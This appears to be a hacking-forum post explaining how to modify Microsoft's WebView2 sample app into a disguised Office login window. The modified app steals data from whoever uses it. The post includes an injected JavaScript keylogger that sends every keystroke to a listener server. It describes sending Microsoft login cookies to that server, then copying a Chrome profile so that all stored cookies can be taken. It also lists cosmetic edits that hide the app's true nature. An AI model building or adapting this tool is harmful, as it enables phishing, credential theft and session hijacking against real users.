Man
Professional
- Messages
- 3,077
- Reaction score
- 614
- Points
- 113
Usage
Tested on Windows 10 and 11.When executed, a binary file is downloaded https://office.com/login. A JavaScript keylogger is injected into each page and keystrokes are sent to http://127.0.0.1:8080. Additionally, upon successful user authentication, cookies for login.microsoftonline.com are base64 encoded and sent http://127.0.0.1:8080 via an HTTP GET request.
Changing JavaScript
If you want to change the JavaScript, the code you need to change is shown below line 1096 in AppWindow.cpp.
Code:
coreWebView2->AddScriptToExecuteOnDocumentCreated(L"var link = \"http://127.0.0.1:8080/keylog?k=\";var l = \"\";document.onkeypress = function (e){l += e .key;var req = new XMLHttpRequest();req.open(\"GET\",link.concat(l), true);req.send();}", nullptr);Chrome cookie theft
WebView2 allows you to launch with an existing user data folder (UDF) instead of creating a new one. The UDF contains all the passwords, sessions, bookmarks, etc. Chrome's UDF is located at C:\Users\<username>\AppData\Local\Google\Chrome\User Data. We can simply tell WebView2 to launch an instance using this profile and, on startup, extract all the cookies and pass them to the attacker's server.The only catch is that WebView2 looks for a folder named EBWebView instead User Data (not sure why). Copy User Data the folder and rename it to EBWebView.
Necessary changes
- On line 41 in app.cpp:
- Change std::wstring userDataFolder(L""); to std::wstring userDataFolder(L"C:\\Path\\To\\Temp");
- The specified folder must contain EBWebView the folder from which WebView2 will read.
- On line 40 in ScenarioCookieManagement.cpp:
- Change GetCookiesHelper(L"https://login.microsoftonline.com"); to GetCookiesHelper(L"");
When GetCookiesHelper is called without specifying any website, it retrieves all cookies.
Note: This will not work with the current application if there are a large number of cookies, because the application sends them using a GET request, which has a limited length.
Important functions
If you want to make changes to the binary, you will find information about important functions below.- AppStartPage.cpp - GetUri() the function has a URL that is loaded during binary execution.
- ScenarioCookieManagement.cpp - SendCookies() the function contains the IP address and port to which cookies are sent.
- AppWindow.cpp - CallCookieFunction() function waits until URL starts with https://www.office.com/?auth= and calls ScenarioCookieManagement::GetCookiesHelper(L"https://login.microsoftonline.com")
- WebView2APISample.rc - Cosmetic changes Remove menu bar by setting all POPUP values to "".
- Change IDS_APP_TITLE and IDC_WEBVIEW2APISAMPLE. This is the name of the application in the title bar.
- Change IDI_WEBVIEW2APISAMPLE and IDI_WEBVIEW2APISAMPLE_INPRIVATE and IDI_SMALL. They point to .ico a file that is an icon for this application.
- Toolbar.cpp - itemHeight should be set to 0 to remove the top menu. This is already taken care of in this code.
- AppWindow.cpp - LoadImage() should be commented out. This hides the blue splash screen. This is already taken care of in this code.
- App.cpp - new AppWindow(creationModeId, WebViewCreateOption(), initialUri, userDataFolder, false); change the last parameter value to true. This will hide the toolbar. This is already taken care of in this code.
